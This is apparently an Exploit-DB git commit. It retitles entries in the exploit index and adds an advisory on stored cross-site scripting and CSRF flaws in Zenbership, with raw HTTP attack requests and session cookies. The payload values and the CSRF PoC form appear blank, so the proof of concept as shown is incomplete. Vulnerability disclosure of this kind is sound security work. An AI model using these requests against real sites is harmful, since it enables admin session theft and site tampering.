From e380b207cec0446a404a2917aa588bf2d7a449da Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 24 Oct 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-10-24 1 new exploits dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock) Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC) Microsoft Excel 2010 - Crash PoC (2) Microsoft Excel 2010 - Crash (PoC) (2) Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit) Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) The Unarchiver 3.11.1 - '.tar.Z' Crash PoC The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC) Microsoft Edge - Function.apply Infomation Leak (MS16-119) Microsoft Edge - 'Function.apply' Information Leak (MS16-119) Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit) Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) Zenbership 107 - Multiple Vulnerabilities --- files.csv | 15 +-- platforms/php/webapps/40620.txt | 183 ++++++++++++++++++++++++++++++++ 2 files changed, 191 insertions(+), 7 deletions(-) create mode 100755 platforms/php/webapps/40620.txt diff --git a/files.csv b/files.csv index afafbf47f..d3c5d8ad0 100755 --- a/files.csv +++ b/files.csv @@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900 -36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 +36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 @@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 -39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 +39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80 39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 @@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port 39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 -39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0 +39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0 39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0 @@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 -40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 +40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0 40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0 40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0 @@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port 40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0 40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0 40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0 -40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0 +40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80 40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0 40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0 @@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port 40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0 40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0 40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0 -40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 +40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 -40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 +40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0 40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0 @@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0 40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0 +40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0 diff --git a/platforms/php/webapps/40620.txt b/platforms/php/webapps/40620.txt new file mode 100755 index 000000000..2338b9033 --- /dev/null +++ b/platforms/php/webapps/40620.txt @@ -0,0 +1,183 @@ +1. ADVISORY INFORMATION +======================================== +Title: Zenbership (latest version) - Multiple Vulnerabilities +Application: Zenbership +Class: Sensitive Information disclosure +Versions Affected: <= latest version ) +Vendor URL: https://www.zenbership.com/ +Software URL: https://www.zenbership.com/Download +Bugs: CSRF / Persistent Cross Site Scripting +Date of found: 23.10.2016 +Author: Besim + + +2.CREDIT +======================================== +Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN + + +3. VERSIONS AFFECTED +======================================== + <= latest version + + + +4. TECHNICAL DETAILS & POC +======================================== + + +PR1 - Stored Cross Site Scripting +======================================== + +1 ) Admin login admin panel +2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2) +3 ) Attacker enter xss payload to last name input +4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts) +5 ) Vulnerability Parameter and Payload : &last_name= + +## HTTP Request ## + +POST /zenbership/pp-functions/form_process.php HTTP/1.1 +Host: site_name +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2 +Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 153 + + - POST DATA + +page=1 +&session=zen_0176e737b450bbd83f5fc1066 +&first_name=Besim +&last_name= +&email=exploit@yopmail.com + + +PR2 - CSRF +======================================== + +1 ) Attacker can add new event with xss payload (stored) + - File : admin/cp-functions/event-add.php + +HTTP Request and CSRF PoC +========================= + + +## HTTP Request ## + +POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1 +Host: site_name +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://site_name/zenbership/admin/index.php?l=events +Content-Length: 1206 +Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44 +Connection: close + + + - POST DATA + + +id=JFW996951 +&ext= +&edit=0 +&event[id]=JFW996951&event[status]=1 +&event[name]= +&event[tagline]=Meryem&event[description]=

Meryem AKDOGAN

+&event[post_rsvp_message]=

Meryem AKDOGAN

+&event[calendar_id]=1 +&event[custom_template]= +&tags= +&event[starts]=2016-10-26 00:00:00 +&event[ends]=2016-10-28 00:00:00 +&event[start_registrations]=2016-10-24 00:00:00 +&event[close_registration]=&event[early_bird_end]= +&event[online]=0&event[location_name]=Turkey +&event[url]=&event[address_line_1]= +&event[address_line_2]=&event[city]= +&event[state]=&event[zip]= +&event[country]= +&event[phone]= +&limit_attendees_dud=0 +&event[max_rsvps]= +&event[members_only_view]=0 +&event[members_only_rsvp]=0 +&event[allow_guests]=1 +&event[max_guests]=1 +&form[col2][Account Overview]=section +&form[col2][company_name]=1 +&form[col2][address_line_1]=0 +&form[col2][address_line_2]=0 +&form[col2][city]=0 +&form[col2][state]=0 +&form[col2][zip]=0 +&form[col2][country]=0 +&form[col2][url]=0 + + + +## CSRF PoC ## + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +